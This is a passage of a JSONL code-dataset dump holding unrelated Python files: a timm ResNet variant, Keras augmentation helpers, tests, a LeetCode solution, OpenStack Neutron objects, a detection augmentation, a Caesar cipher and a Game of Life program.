return self.fc\n\n def reset_classifier(self, num_classes, global_pool='avg'):\n self.num_classes = num_classes\n self.global_pool, self.fc = create_classifier(self.num_features, self.num_classes, pool_type=global_pool)\n\n def forward_features(self, x):\n x = self.conv1(x) # torch.Size([2, 3, 224, 224]) -> torch.Size([2, 64, 112, 112])\n x = self.bn1(x) # torch.Size([2, 64, 112, 112]) -> torch.Size([2, 64, 112, 112])\n x = self.act1(x) # torch.Size([2, 64, 112, 112]) -> torch.Size([2, 64, 112, 112])\n x = self.maxpool(x) # torch.Size([2, 64, 112, 112]) -> torch.Size([2, 64, 56, 56])\n\n x = self.layer1(x) # torch.Size([2, 64, 56, 56]) -> torch.Size([2, 256, 56, 56])\n x = self.layer2(x) # torch.Size([2, 256, 56, 56]) -> torch.Size([2, 512, 28, 28])\n x = self.layer3(x) # torch.Size([2, 512, 28, 28]) -> torch.Size([2, 1024, 14, 14])\n x = self.layer4(x) # torch.Size([2, 1024, 14, 14]) -> torch.Size([2, 2048, 7, 7])\n return x\n\n def forward(self, x):\n x = self.forward_features(x) # torch.Size([2, 2048, 7, 7])\n x = self.global_pool(x) # torch.Size([2, 2048, 7, 7]) -> torch.Size([2, 2048])\n if self.drop_rate:\n x = F.dropout(x, p=float(self.drop_rate), training=self.training)\n x = self.fc(x)\n return x\n\n\ndef _create_resnet(variant, pretrained=False, **kwargs):\n return build_model_with_cfg(ResNet, variant, pretrained, default_cfg=default_cfgs[variant], model_cfg=model_cfgs[variant], **kwargs)\n\n\n@register_model\ndef resnet18_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-18 model.\n \"\"\"\n model_args = dict(block=BasicBlock, layers=[2, 2, 2, 2], **kwargs)\n return _create_resnet('resnet18_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet34_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-34 model.\n \"\"\"\n model_args = dict(block=BasicBlock, layers=[3, 4, 6, 3], **kwargs)\n return _create_resnet('resnet34_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet2_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-26 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[2, 2, 2, 2], **kwargs)\n return _create_resnet('resnet26_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet50_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[3, 4, 6, 3], **kwargs)\n return _create_resnet('resnet50_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet101_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-101 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[3, 4, 23, 3], **kwargs)\n return _create_resnet('resnet101_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet152_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-152 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[3, 8, 36, 3], **kwargs)\n return _create_resnet('resnet152_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet200_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-200 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[3, 24, 36, 3], **kwargs)\n return _create_resnet('resnet200_hil', pretrained, **model_args)\n\n\n@register_model\ndef resnet50_3x1_hil(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[3, 4, 6, 3], **kwargs)\n return _create_resnet('resnet50_3x1_hil', pretrained, **model_args)\n","repo_name":"TencentYoutuResearch/BaseArchitecture-EAT","sub_path":"timm/models/resnet_hilbert.py","file_name":"resnet_hilbert.py","file_ext":"py","file_size_in_byte":17237,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"27276069381","text":"# Utilities.py\n# Various functions for the Image Classification demonstration with Keras\n# Dr. Matthew Smith, SUT, ADACS/CAS\n\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nimport numpy as np\n\n\ndef swish(x):\n\t# The swish activation function\n\t# Not currently used, but you *might* want to.\n\tbeta = 1.5\n\treturn beta*x*np.exp(x)/(np.exp(x)+1)\n\ndef Preview_Image_Generator(flip_mode):\n\t# This function is designed to give us a feel for the behaviour\n\t# of the imagedatagenerator function shipped with Keras.\n\t# It will augment the data contained in 0.jpg (cats, 'cause cats are cool)\n\t# and produce variations of this image, saved in ./preview\n\tdatagen = ImageDataGenerator(rotation_range=40,width_shift_range=0.2, height_shift_range=0.2,\n\t shear_range=0.2, zoom_range=0.2,horizontal_flip=flip_mode,fill_mode='nearest')\n\n\timg = load_img('./train/cats/0.jpg') # Work with image 0 to start with\n\tx = img_to_array(img) # this is a Numpy array with shape (3, 150, 150)\n\tx = x.reshape((1,) + x.shape) # this is a Numpy array with shape (1, 3, 150, 150)\n\n\t# the .flow() command below generates batches of randomly transformed images\n\t# and saves the results to the `preview/` directory\n\ti = 0\n\tfor batch in datagen.flow(x, batch_size=1, save_to_dir='preview', save_prefix='cat', save_format='jpeg'):\n\t\ti += 1\n\t\tif i > 20:\n\t\t\tbreak # otherwise the generator would loop indefinitely\n\n\treturn 0\n\n\ndef Prepare_Image_Data(shear, zoom, flip_mode, test_flag):\n\t# Decide what features to use in ImageDataGenerator depending on\n\t# whether or not we are training or testing.\n\tif (test_flag == False):\n\t\t# Training data - will employ data augmentation, so can flip, zoom, shear etc.\n\t\t# Normalise the RGB data to between 0 and 1\n\t\tdatagen = ImageDataGenerator(rescale=1.0/255.0,\n\t \t shear_range = shear, zoom_range = zoom, horizontal_flip = flip_mode)\n\telse:\n\t\t# We don't need to augment the test data set - no reason to shift, zoom or flip.\n\t\t# Still need to rescale, though, since training employed normalisation.\n\t\tdatagen = ImageDataGenerator(rescale=1.0/255.0)\n\n\treturn datagen\n\n","repo_name":"archembaud/ADACS_ML_D","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44179523658","text":"from quantfinance.data import get_stocks_prices_yahoo\nfrom quantfinance.portfolio_ica import portfolio_ica\n\n\ndef test_portfolio_ica():\n prices = get_stocks_prices_yahoo(\n [\"VTI\", \"AGG\", \"DBC\", \"^VIX\"],\n frequency=\"daily\",\n start=\"2010-07-31\",\n end=\"2020-12-31\",\n )\n\n returns = prices.pct_change().dropna()\n\n returns = returns.values\n\n returns_independent, returns_pca, _, _ = portfolio_ica(returns, num_pca=2)\n\n assert returns_independent.shape[1] == 2\n assert returns_pca.shape[1] == 2\n\n\ndef test_portfolio_ica_no_components():\n prices = get_stocks_prices_yahoo(\n [\"VTI\", \"AGG\", \"DBC\", \"^VIX\"],\n frequency=\"daily\",\n start=\"2010-07-31\",\n end=\"2020-12-31\",\n )\n\n returns = prices.pct_change().dropna()\n\n returns = returns.values\n\n returns_independent, returns_pca, _, _ = portfolio_ica(returns, num_pca=None)\n\n assert returns_independent.shape[1] == 3\n assert returns_pca.shape[1] == 3\n","repo_name":"howardya/quantfinance","sub_path":"test/test_portfolio_ica.py","file_name":"test_portfolio_ica.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5438493173","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 19 14:44:57 2017\n\n@author: ksagilop\n\n1.2 Recursive Directory Tree\nImplement a program that asks for a directory and \nprints all the files in that directory recursively\nas a tree.\n\nHints:\n- Use the os.listdir() and os.path.isdir() functions\n\"\"\"\n# Modules\nimport os\n\ndef user():\n '''Get path to be read in the form '''\n path = input('Directory path? ')\n return path\n\n# Using listdir is not clear how to do the recursive\ndef tree(path):\n '''Construct the directory tree iaw the path provided'''\n s = '\\\\' # construct a \\ literaly by \\\\\n print(path + s)\n items = os.listdir(path)\n for i in range(len(items)):\n item = os.path.join(path, items[i])\n if os.path.isdir(item):\n print('|--', items[i] + s)\n else: print('|--', items[i])\n return\n \npath = user()\n#tree(path)\n\n# Another way to get folder, subfolder and files is with os.walk\nfor dirs, subs, files in os.walk(path):\n print(dirs)\n print(subs)\n print(files)","repo_name":"pandastrail/InfoEng","sub_path":"scripting/exercises/P05_1_2.py","file_name":"P05_1_2.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3435513980","text":"from collections import Counter, deque\nimport heapq\nclass Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n task_q = [(-count,task) for task,count in Counter(tasks).items()]\n heapq.heapify(task_q)\n cooldown_q = deque([])\n \n t = 0\n while task_q or cooldown_q:\n while cooldown_q and cooldown_q[-1][0] <= t:\n t_cooldown, count, task = cooldown_q.pop()\n heapq.heappush(task_q, (count, task))\n \n if task_q:\n count, task = heapq.heappop(task_q)\n else:\n t_cooldown, count, task = cooldown_q.pop()\n #print(f\"{t}: idle x{t_cooldown-t}\")\n t = t_cooldown\n count += 1\n #print(f\"{t+1}: {task}, rem:{-count}\")\n if count < 0:\n cooldown_q.appendleft((t+1+n, count, task))\n t += 1\n \n return t\n","repo_name":"jlcarr/LeetCode","sub_path":"Problem_0621/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8671851841","text":"import netaddr\n\nfrom neutron_lib.objects import common_types\nfrom oslo_log import log as logging\nfrom oslo_versionedobjects import fields as obj_fields\n\nfrom neutron.db.models import ndp_proxy as models\nfrom neutron.objects import base\n\nLOG = logging.getLogger(__name__)\n\n\n@base.NeutronObjectRegistry.register\nclass NDPProxy(base.NeutronDbObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n\n db_model = models.NDPProxy\n\n primary_keys = ['id']\n foreign_keys = {'Router': {'router_id': id}, 'Port': {'port_id': id}}\n\n fields = {\n 'id': common_types.UUIDField(),\n 'name': obj_fields.StringField(nullable=True),\n 'project_id': obj_fields.StringField(nullable=True),\n 'router_id': common_types.UUIDField(nullable=False),\n 'port_id': common_types.UUIDField(nullable=False),\n 'ip_address': obj_fields.IPV6AddressField(),\n 'description': obj_fields.StringField(nullable=True)\n }\n\n fields_no_update = ['id', 'project_id']\n\n @classmethod\n def modify_fields_from_db(cls, db_obj):\n result = super(NDPProxy, cls).modify_fields_from_db(db_obj)\n if 'ip_address' in result:\n result['ip_address'] = netaddr.IPAddress(\n result['ip_address'])\n return result\n\n @classmethod\n def modify_fields_to_db(cls, fields):\n result = super(NDPProxy, cls).modify_fields_to_db(fields)\n if 'ip_address' in result:\n if result['ip_address'] is not None:\n result['ip_address'] = cls.filter_to_str(\n result['ip_address'])\n return result\n\n\n@base.NeutronObjectRegistry.register\nclass RouterNDPProxyState(base.NeutronDbObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n db_model = models.RouterNDPProxyState\n\n foreign_keys = {'Router': {'router_id': id}}\n primary_keys = ['router_id']\n\n fields = {\n 'router_id': common_types.UUIDField(nullable=False),\n 'enable_ndp_proxy': obj_fields.BooleanField(nullable=False),\n }\n","repo_name":"openstack/neutron","sub_path":"neutron/objects/ndp_proxy.py","file_name":"ndp_proxy.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"39217632869","text":"def lingkaran(r):\n luas = 3.14 * (r**2)\n keliling = 2 * 3.14 * r\n print(\"luas lingkaran : \", luas)\n print(\"keeliling lingkaran : \", keliling)\n \n\ndef segitiga(a,t):\n luas = 1/2 * a *t\n keliling = a * 3\n print(\"luas segitiga : \", luas)\n print(\"keeliling segitiga : \", keliling)\n \n","repo_name":"assidik12/TA-python","sub_path":"modul.py","file_name":"modul.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8507489970","text":"import copy\nimport math\nimport torch\nimport random\nimport numpy as np\nfrom detectron2.structures.boxes import Boxes\nfrom detectron2.structures.masks import PolygonMasks\nfrom detectron2.augmentations.image_level_augs.scale_jitter import scale_jitter\nfrom detectron2.augmentations.vis import _vis\n\n\nclass Zoom_out(object):\n def __init__(self, ratio=1.0, img_pool_size=10, iou_threshold=0.5, size_divisible=2):\n self.ratio = ratio\n self.img_pool = []\n self.img_pool_size = img_pool_size\n self.iou_threshold =iou_threshold\n self.size_divisible = size_divisible\n\n def __call__(self, tensor, target):\n if self.ratio >= 1.0:\n return tensor, target\n\n self.img_pool.append({'tensor': tensor, 'target': target})\n\n if len(self.img_pool) > self.img_pool_size:\n self.img_pool.pop(0)\n\n if len(self.img_pool) < 4:\n return tensor, target\n\n use_mask = ('gt_masks' in target)\n\n bbox = target['gt_boxes']\n classes = target['gt_classes']\n masks = target['gt_masks'] if use_mask else None\n\n c, h, w = tensor.shape\n h = int(math.ceil(h / self.size_divisible) * self.size_divisible)\n w = int(math.ceil(w / self.size_divisible) * self.size_divisible)\n\n new_h, new_w = int(self.ratio * h), int(self.ratio * w)\n in_tensor, in_bbox, in_mask = scale_jitter(tensor, bbox, self.ratio, (new_h, new_w), masks)\n\n pad_imgs = random.sample(self.img_pool, 3)\n pad_tensors, pad_bboxes, pad_masks = [], [], []\n for img in pad_imgs:\n pad_tensor, pad_bbox, pad_mask = scale_jitter(img['tensor'], img['target']['gt_boxes'], self.ratio, (new_h, new_w), img['target']['gt_masks'] if use_mask else None)\n pad_tensors.append(pad_tensor)\n pad_bboxes.append(pad_bbox)\n pad_masks.append(pad_mask)\n\n crop_boxes = [(new_h, w-new_w), (h-new_h, new_w), (h-new_h, w-new_w)]\n\n tensor_out = in_tensor.new(*(c, h, w)).zero_()\n tensor_out[:c, :new_h, :new_w].copy_(in_tensor)\n tensor_out[:c, :new_h, new_w:].copy_(pad_tensors[0][:c, :crop_boxes[0][0], :crop_boxes[0][1]])\n tensor_out[:c, new_h:, :new_w].copy_(pad_tensors[1][:c, :crop_boxes[1][0], :crop_boxes[1][1]])\n tensor_out[:c, new_h:, new_w:].copy_(pad_tensors[2][:c, :crop_boxes[2][0], :crop_boxes[2][1]])\n\n crop_bboxes, crop_classes, crop_masks = [], [], []\n for i, pad_bbox in enumerate(pad_bboxes):\n crop_bbox = copy.deepcopy(pad_bbox)\n crop_bbox.clip(crop_boxes[i])\n ious = crop_bbox.area() / pad_bbox.area()\n inds = ious >= self.iou_threshold\n crop_bbox = crop_bbox[inds]\n crop_bboxes.append(crop_bbox)\n crop_classes.append(pad_imgs[i]['target']['gt_classes'][inds])\n if use_mask:\n crop_masks.append([mask for j, mask in enumerate(pad_masks[i]) if inds[j]])\n\n offsets_box = [torch.Tensor([0.0,0.0,0.0,0.0]), torch.Tensor([new_w, 0.0, new_w, 0.0]), torch.Tensor([0.0, new_h, 0.0, new_h]), torch.Tensor([new_w, new_h, new_w, new_h])]\n offsets_mask = [[0.0, 0.0], [0.0, new_w], [new_h, 0], [new_h, new_w]]\n bbox_out = Boxes(torch.cat([target.tensor + offsets_box[i] for i, target in enumerate([in_bbox] + crop_bboxes)], dim=0))\n classes_out = torch.cat([classes] + crop_classes, dim=0)\n target_out = {'gt_boxes': bbox_out, 'gt_classes': classes_out}\n\n if use_mask:\n masks_out = []\n for i, crop_mask in enumerate([in_mask]+crop_masks):\n mask_out = []\n for polys in crop_mask:\n poly_out = []\n for poly in polys:\n poly_new = copy.deepcopy(poly)\n poly_new[0::2] = poly_new[0::2] + offsets_mask[i][1]\n poly_new[1::2] = poly_new[1::2] + offsets_mask[i][0]\n poly_out.append(poly_new)\n mask_out.append(poly_out)\n\n masks_out += mask_out\n masks_out = PolygonMasks(masks_out)\n target_out['gt_masks'] = masks_out\n\n return tensor_out, target_out\n","repo_name":"qqlu/Entity","sub_path":"Entity/EntitySegRLE/entityseg/data/augmentations/image_level_augs/zoom_out.py","file_name":"zoom_out.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":593,"dataset":"github-code","pt":"72"} +{"seq_id":"36291970037","text":"from string import ascii_uppercase, ascii_lowercase\ndef solution(s, n):\n answer = ''\n uppercase_converter, lowercase_converter = dict(), dict()\n for i in range(len(ascii_uppercase)):\n uppercase_converter[ascii_uppercase[i]]=ascii_uppercase[(i+n)%26]\n lowercase_converter[ascii_lowercase[i]]=ascii_lowercase[(i+n)%26]\n for c in s:\n if c==' ':\n answer+=c\n elif c.isupper():\n answer+=uppercase_converter[c]\n else:\n answer+=lowercase_converter[c]\n return answer","repo_name":"Pazbear/CodingTestStudy","sub_path":"프로그래머스/LV1/시저_암호.py","file_name":"시저_암호.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24180605493","text":"import re\r\n\r\n\r\nclass Lnode():\r\n def __init__(self, line):\r\n line = line.rstrip('\\n')\r\n n = line.split(\"\\t\", 5)\r\n self.id = int(n[0])\r\n self.is_merged = False\r\n self.age = self.init_age(n[1])\r\n self.gender = int(n[2])\r\n self.tweet_number = int(n[3])\r\n self.tags = set(n[4].split(\";\"))\r\n self.key_words = self.init_key_word(n[5].split(\";\"))\r\n self.group = [int(n[0])]\r\n\r\n def init_age(self, birth):\r\n if re.search(\"-\", birth):\r\n return 0\r\n else:\r\n return 2018 - int(birth)\r\n\r\n def init_key_word(self, key_word_list):\r\n key_word_ = set()\r\n for key_word in key_word_list:\r\n k = key_word.split(\":\")\r\n key_word_.add(k[0])\r\n return key_word_\r\n\r\n @staticmethod\r\n def are_nodes_similar(lnode1, lnode2):\r\n weight = 0\r\n\r\n # is age of two nodes similar\r\n if lnode1.age == 0 or not lnode2.age == 0:\r\n weight += 0.1\r\n else:\r\n age_diff = int(lnode1.age) - (lnode2.age)\r\n if -3 < age_diff < 3:\r\n weight += 0.2\r\n elif -5 < age_diff < 5:\r\n weight += 0.15\r\n elif -7 < age_diff < 7:\r\n weight += 0.1\r\n elif -10 < age_diff < 10:\r\n weight += 0.05\r\n\r\n # is gender of two nodes similar\r\n if lnode1.gender == 0 or lnode2.gender == 0:\r\n weight += 0.1\r\n elif -0.1 < lnode1.gender - lnode2.gender < 0.1:\r\n weight += 0.2\r\n elif -0.2 < lnode1.gender - lnode2.gender < 0.2:\r\n weight += 0.15\r\n elif -0.3 < lnode1.gender - lnode2.gender < 0.3:\r\n weight += 0.1\r\n elif -0.4 < lnode1.gender - lnode2.gender < 0.4:\r\n weight += 0.05\r\n\r\n # is tweet_number od two nodes similar\r\n if lnode1.tweet_number != 0 and lnode2.tweet_number != 0:\r\n tweet_number1, tweet_number2 = lnode1.tweet_number, lnode2.tweet_number\r\n if tweet_number1 < tweet_number2:\r\n tweet_number1, tweet_number2 = tweet_number2, tweet_number1\r\n times = tweet_number1 / tweet_number2\r\n if times < 1.2:\r\n weight += 0.1\r\n elif times < 2:\r\n weight += 0.05\r\n\r\n # is tag of two nodes similar\r\n min_set_len = len(lnode1.tags) if len(lnode1.tags) <= len(lnode2.tags) else len(lnode2.tags)\r\n inter_set_len = len(lnode1.tags & lnode2.tags)\r\n weight += (inter_set_len / min_set_len) * 0.3\r\n\r\n # are key words of two nodes similar\r\n min_set_len = len(lnode1.key_words) if len(lnode1.key_words) <= len(lnode2.key_words) else len(lnode2.key_words)\r\n inter_set_len = len(lnode1.key_words & lnode2.key_words)\r\n weight += (inter_set_len / min_set_len) * 0.2\r\n\r\n return weight\r\n\r\n @staticmethod\r\n def merge_nodes_attribute(lnode1, lnode2):\r\n len1 = len(lnode1.group)\r\n len2 = len(lnode2.group)\r\n lnode1.age = (lnode1.age * len1 + lnode2.age * len2) / (len1 + len2)\r\n lnode1.gender = (lnode1.gender * len1 + lnode2.gender * len2) / (len1 + len2)\r\n lnode1.tweet_number = (lnode1.tweet_number * len1 + lnode2.tweet_number * len2) / (len1 + len2)\r\n lnode1.tags = lnode1.tags | lnode2.tags\r\n lnode1.key_words = lnode1.key_words | lnode2.key_words\r\n lnode1.group.extend(lnode2.group)\r\n lnode2.group.clear()\r\n lnode2.is_merged = True\r\n","repo_name":"yangli655/weibo_community_detect","sub_path":"Lnode.py","file_name":"Lnode.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11208734164","text":"from random import choice\nfrom time import sleep\nfrom graphics import *\nfrom math import floor\n\n# Setup: board size, random value generator, create board and rectangles.\n\ndef size():\n \"\"\" Returns the size of the board.\"\"\"\n return 16\n\ndef random_bit():\n \"\"\"Returns a random value of True or False.\"\"\"\n return choice([True,False])\n\ndef initiate():\n \"\"\"Returns an initial (random) board and accompanying rectangles.\"\"\"\n board = []\n for i in range(size()): # fills in the initial board.\n row = []\n for j in range(size()):\n row.append(random_bit())\n board.append(row)\n \n rectangles = [] \n for i in range(size()): # constructs initial rectangles.\n row = []\n for j in range(size()):\n row.append(Rectangle(Point(i,j),Point(i+1,j+1)))\n rectangles.append(row)\n \n return (board,rectangles)\n \n# Graphical methods. Please note: I changed the colours in update_color\n# because the grey used in the exercise appeared black on my computer.\n\ndef update_color(x,y,board,rectangles):\n \"\"\"Sets color in rectangles[x][y] to correct value according to the\n status of its corresponding cell in board.\"\"\"\n if (board[x][y]):\n rectangles[x][y].setFill(\"DarkRed\")\n else:\n rectangles[x][y].setFill(\"DimGray\")\n\ndef set_colors(board,rectangles):\n \"\"\"Given a board, colours all rectangles accordingly.\"\"\"\n for i in range(size()):\n for j in range(size()):\n update_color(i,j,board,rectangles)\n\ndef set_changed_colors(board,rectangles,changes):\n \"\"\"Only updates the cell colour for changed states.\"\"\"\n for cell in changes:\n [i,j] = cell\n update_color(i,j,board,rectangles)\n\ndef draw_cells(rectangles,window):\n \"\"\"Draws rectangles' cells in the window.\"\"\"\n for row in rectangles:\n for cell in row:\n cell.draw(window)\n\n# General game components.\n\ndef living_neighbors(x,y,board):\n \"\"\" Counts the number of living neighbors of the cell in the given\n coordinate (x,y). If either coordinate is on the edge, we wrap.\n Finally, we return the number of neighbors.\"\"\"\n neighbors = 0\n\n top1 = board[(x-1)%size()][(y+1)%size()]\n top2 = board[x][(y+1)%size()]\n top3 = board[(x+1)%size()][(y+1)%size()]\n mid1 = board[(x-1)%size()][y]\n mid2 = board[(x+1)%size()][y]\n low1 = board[(x-1)%size()][(y-1)%size()]\n low2 = board[x][(y-1)%size()]\n low3 = board[(x+1)%size()][(y-1)%size()]\n\n list_of_neighbors = [top1,top2,top3,mid1,mid2,low1,low2,low3]\n\n for cell in list_of_neighbors:\n if cell == True:\n neighbors = neighbors + 1\n return neighbors\n\ndef change_list(board1,board2):\n \"\"\"Takes in two boards and returns a list of coordinates for those\n cells which have switched state.\"\"\"\n changes = []\n for i in range(size()):\n for j in range(size()):\n if board1[i][j] != board2[i][j]:\n changes.append([i,j])\n return(changes)\n\ndef iterate(board):\n \"\"\"Does one iteration, returns the next generation of cells.\n Returns the tuple (living,new_board), where living is the number of\n live cells and board is a matrix of boolean values corresponding\n to the liveness of each cell.\"\"\"\n new_board = [] \n for i in range(size()): # generates a completely False board.\n row = []\n for j in range(size()):\n row.append(False)\n new_board.append(row)\n \n for i in range(size()): # living cells set to True; False otherwise.\n for j in range(size()):\n if board[i][j] == True:\n new_board[i][j] = (1 < living_neighbors(i,j,board) < 4)\n else:\n new_board[i][j] = (living_neighbors(i,j,board) == 3) \n\n living = 0 # counts the living\n for i in range(size()):\n for j in range(size()):\n if new_board[i][j] == True:\n living = living + 1\n\n changes = change_list(new_board,board)\n return (living,new_board,changes)\n\n# Oppgave 1's main method is mini_life():\n\ndef mini_life():\n \"\"\"Simple version of Game of Life. Runs through life cycles in a\n 16x16 grid. User kills process manually.\"\"\"\n\n window = GraphWin(\"Game of Life: mini-edition\",400,400)\n window.setCoords(0,0,size(),size())\n \n (base_board,rectangles) = initiate()\n set_colors(base_board,rectangles)\n draw_cells(rectangles,window)\n while True:\n (living,new_board,changes) = iterate(base_board)\n base_board = new_board\n set_changed_colors(base_board,rectangles,changes)\n sleep(0.4)\n\n# Oppgave 2's main method is big_life(), will use the following:\n\ndef is_inside(button,point):\n \"\"\"Returns True iff the point lies inside the button.\"\"\"\n x_pt = point.getX()\n y_pt = point.getY()\n x_lo = button.getP1().getX()\n y_lo = button.getP1().getY()\n x_hi = button.getP2().getX()\n y_hi = button.getP2().getY()\n return (x_lo < x_pt < x_hi) and (y_lo < y_pt < y_hi)\n\ndef in_grid(point):\n \"\"\"Yields True iff point is on the board (i.e., if user has clicked\n a cell.)\"\"\"\n x_pt = point.getX()\n y_pt = point.getY()\n lo = 0\n hi = size()\n return (lo <= x_pt <= hi) and (lo <= y_pt <= hi)\n\n\ndef big_life():\n \"\"\"Full version of Game of Life. Starts with a randomized board.\n User can type a number of iterations in the Cycles field and START\n the game. User can CLEAR, RANDOMIZE, LOAD or SAVE a board. Clicking\n on a cell switches its state. Use QUIT to exit.\"\"\"\n \n window = GraphWin(\"Game of Life\",500,600)\n window.setCoords(0,-3,size(),size())\n window.setBackground(\"white\")\n\n# We start by generating the iteration entry field, buttons and text.\n\n entry = Entry(Point(1,-0.5),5)\n entry.setText(\"13\") # default value makes START usable immediately.\n entry_text = Text(Point(1,-1.2),\"Cycles\")\n entry.draw(window)\n entry_text.draw(window)\n\n y1 = -2.9 # these y-values are used with all buttons and their text.\n y2 = -0.1\n y3 = -2.5 \n\n st_pt1 = Point(1.76,y1)\n st_pt2 = Point(3.74,y2)\n start = Rectangle(st_pt1,st_pt2)\n start_text = Text(Point(2.75,y3),\"START\")\n start.setFill(\"MediumSeaGreen\")\n start.setOutline(\"white\")\n start.draw(window)\n start_text.draw(window)\n\n cl_pt1 = Point(3.76,y1)\n cl_pt2 = Point(5.74,y2)\n clear = Rectangle(cl_pt1,cl_pt2)\n clear_text = Text(Point(4.75,y3),\"CLEAR\")\n clear.setFill(\"DeepSkyBlue\")\n clear.setOutline(\"white\")\n clear.draw(window)\n clear_text.draw(window)\n\n ran_pt1 = Point(5.76,y1)\n ran_pt2 = Point(8.74,y2)\n randomize = Rectangle(ran_pt1,ran_pt2)\n random_text = Text(Point(7.25,y3),\"RANDOMIZE\")\n randomize.setFill(\"DarkOrchid\")\n randomize.setOutline(\"white\")\n randomize.draw(window)\n random_text.draw(window)\n\n ld_pt1 = Point(8.76,y1)\n ld_pt2 = Point(10.74,y2)\n load = Rectangle(ld_pt1,ld_pt2)\n load_text = Text(Point(9.75,y3),\"LOAD\")\n load.setFill(\"MediumVioletRed\")\n load.setOutline(\"white\")\n load.draw(window)\n load_text.draw(window)\n\n sv_pt1 = Point(10.76,y1)\n sv_pt2 = Point(13.74,y2)\n save = Rectangle(sv_pt1,sv_pt2)\n save_text = Text(Point(12.25,y3),\"SAVE\")\n save.setFill(\"Gold\")\n save.setOutline(\"white\")\n save.draw(window)\n save_text.draw(window)\n\n gb_pt1 = Point(13.76,y1)\n gb_pt2 = Point(16,y2)\n goodbye = Rectangle(gb_pt1,gb_pt2)\n bye_text = Text(Point(14.875,y3),\"QUIT\")\n goodbye.setFill(\"FireBrick\")\n goodbye.setOutline(\"white\")\n goodbye.draw(window)\n bye_text.draw(window)\n\n\n# We then get an initial board for the Game of Life:\n (base_board,rectangles) = initiate()\n set_colors(base_board,rectangles)\n draw_cells(rectangles,window)\n go_on = True\n\n# Users can now click the buttons.\n while go_on == True:\n click = window.getMouse()\n\n if is_inside(start,click):\n iterations_text = entry.getText()\n iterations = eval(iterations_text)\n for cycles in range(iterations):\n (live,new_board,changes) = iterate(base_board)\n base_board = new_board\n set_changed_colors(base_board,rectangles,changes)\n sleep(0.4)\n\n elif is_inside(clear,click):\n cleared_board = []\n for i in range(size()):\n row = []\n for j in range(size()):\n row.append(False)\n cleared_board.append(row)\n changes = change_list(cleared_board,base_board)\n base_board = cleared_board\n set_changed_colors(base_board,rectangles,changes)\n\n elif is_inside(randomize,click):\n (random_board,new_rectangles) = initiate()\n changes = change_list(random_board,base_board)\n base_board = random_board\n set_changed_colors(base_board,rectangles,changes)\n\n# Note: loaded/saved boards are txt files containing rows of True/False.\n elif is_inside(load,click):\n filename = input(\"Please choose the file to load: \")\n file = open(filename,\"r\")\n print(\"Building new board...\")\n loaded_board = []\n for text_row in file.readlines():\n row = []\n states = text_row.split()\n for state in states:\n row.append(eval(state))\n loaded_board.append(row)\n changes = change_list(loaded_board,base_board)\n base_board = loaded_board\n set_changed_colors(base_board,rectangles,changes)\n print(\"Board loaded.\")\n file.close()\n\n elif is_inside(save,click):\n filename = input(\"Please provide a filename: \")\n file = open(filename,\"w\")\n print(\"Writing to file...\")\n for row in base_board:\n line = \"\"\n for value in range(size()):\n line = line+str(row[value])+\" \"\n line = line+\"\\n\"\n file.write(line)\n print(\"Wrote to file.\")\n file.close()\n\n elif is_inside(goodbye,click):\n go_on = False\n window.close()\n\n elif in_grid(click):\n x = floor(click.getX())\n y = floor(click.getY())\n base_board[x][y] = not base_board[x][y]\n changed_cell = [x,y]\n set_changed_colors(base_board,rectangles,[changed_cell])\n","repo_name":"jaakson/GameOfLife","sub_path":"gameoflife.py","file_name":"gameoflife.py","file_ext":"py","file_size_in_byte":10431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"47140247860","text":"import time\nimport os\nfrom os import path\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport pickle\nfrom basemodels import 